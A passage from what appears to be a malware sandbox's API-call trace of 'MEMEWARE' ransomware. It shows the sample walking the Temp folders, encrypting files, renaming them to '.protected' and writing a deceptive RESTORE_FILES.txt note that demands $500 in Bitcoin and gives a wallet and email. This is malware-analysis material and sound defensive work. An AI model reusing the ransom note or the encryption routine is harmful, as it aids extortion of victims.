SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.949] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0086.950] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.950] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.950] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.950] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0086.950] CloseHandle (hObject=0x14c) returned 1 [0086.951] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.951] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.951] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\RESTORE_FILES.txt") returned 95 [0086.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\Temporary Internet Files\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\temporary internet files\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.952] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.952] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.953] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.953] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.953] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.953] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.953] CloseHandle (hObject=0xd8) returned 1 [0086.953] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.953] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="Windows") returned -1 [0086.953] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="Program Files") returned 1 [0086.954] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="Program Files (x86)") returned 1 [0086.954] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="$Recycle.bin") returned 1 [0086.954] lstrcmpiW (lpString1="vLvAmCg.m4a", lpString2="System Volume Information") returned 1 [0086.954] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a") returned 64 [0086.954] StrStrIW (lpFirst="vLvAmCg.m4a", lpSrch=".protected") returned 0x0 [0086.954] lstrcmpW (lpString1="vLvAmCg.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0086.954] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.954] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vlvamcg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a") returned 64 [0086.954] StrStrW (lpFirst="vLvAmCg.m4a", lpSrch=".txt") returned 0x0 [0086.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a") returned 64 [0086.954] StrStrW (lpFirst="vLvAmCg.m4a", lpSrch=".rar") returned 0x0 [0086.954] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a") returned 64 [0086.955] StrStrW (lpFirst="vLvAmCg.m4a", lpSrch=".zip") returned 0x0 [0086.955] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.955] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.955] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.956] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.956] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.956] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.956] CloseHandle (hObject=0xd8) returned 1 [0086.957] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a.protected") returned 74 [0086.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vlvamcg.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\vLvAmCg.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\vlvamcg.m4a.protected")) returned 1 [0086.958] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="Windows") returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="Program Files") returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="Program Files (x86)") returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="$Recycle.bin") returned 1 [0086.958] lstrcmpiW (lpString1="WPDNSE", lpString2="System Volume Information") returned 1 [0086.958] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE") returned 59 [0086.958] lstrcmpW (lpString1="WPDNSE", lpString2=".") returned 1 [0086.958] lstrcmpW (lpString1="WPDNSE", lpString2="..") returned 1 [0086.958] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\*") returned 61 [0086.958] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0086.959] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.959] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.959] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.959] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.959] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.959] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\.") returned 61 [0086.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.959] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0086.959] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.959] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.959] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.959] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.959] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.959] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\..") returned 62 [0086.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.959] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0086.959] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0086.960] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\RESTORE_FILES.txt") returned 77 [0086.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WPDNSE\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wpdnse\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.960] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.960] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0086.961] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.961] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0086.961] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.961] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0086.961] CloseHandle (hObject=0xd8) returned 1 [0086.962] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="Windows") returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="Program Files") returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="Program Files (x86)") returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="$Recycle.bin") returned 1 [0086.962] lstrcmpiW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="System Volume Information") returned 1 [0086.962] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp") returned 72 [0086.962] StrStrIW (lpFirst="yyeSBWgqBuJy2hT.bmp", lpSrch=".protected") returned 0x0 [0086.962] lstrcmpW (lpString1="yyeSBWgqBuJy2hT.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0086.962] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.962] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yyesbwgqbujy2ht.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp") returned 72 [0086.963] StrStrW (lpFirst="yyeSBWgqBuJy2hT.bmp", lpSrch=".txt") returned 0x0 [0086.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp") returned 72 [0086.963] StrStrW (lpFirst="yyeSBWgqBuJy2hT.bmp", lpSrch=".rar") returned 0x0 [0086.963] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp") returned 72 [0086.963] StrStrW (lpFirst="yyeSBWgqBuJy2hT.bmp", lpSrch=".zip") returned 0x0 [0086.963] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.964] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.964] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.964] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.964] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0086.964] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0086.965] CloseHandle (hObject=0xd8) returned 1 [0086.965] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp.protected") returned 82 [0086.965] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yyesbwgqbujy2ht.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\yyeSBWgqBuJy2hT.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yyesbwgqbujy2ht.bmp.protected")) returned 1 [0086.966] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="Windows") returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="Program Files") returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="Program Files (x86)") returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="$Recycle.bin") returned 1 [0086.967] lstrcmpiW (lpString1="ZfQWOW.wav", lpString2="System Volume Information") returned 1 [0086.967] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav") returned 63 [0086.967] StrStrIW (lpFirst="ZfQWOW.wav", lpSrch=".protected") returned 0x0 [0086.967] lstrcmpW (lpString1="ZfQWOW.wav", lpString2="RESTORE_FILES.txt") returned 1 [0086.967] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0086.967] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0086.967] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zfqwow.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0086.967] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav") returned 63 [0086.967] StrStrW (lpFirst="ZfQWOW.wav", lpSrch=".txt") returned 0x0 [0086.967] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav") returned 63 [0086.968] StrStrW (lpFirst="ZfQWOW.wav", lpSrch=".rar") returned 0x0 [0086.968] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZfQWOW.wav") returned 63 [0086.968] StrStrW (lpFirst="ZfQWOW.wav", lpSrch=".zip") returned 0x0 [0086.968] ReadFile (in: hFile=0xd8, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.968] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.969] WriteFile (in: hFile=0xd8, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0086.969] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, 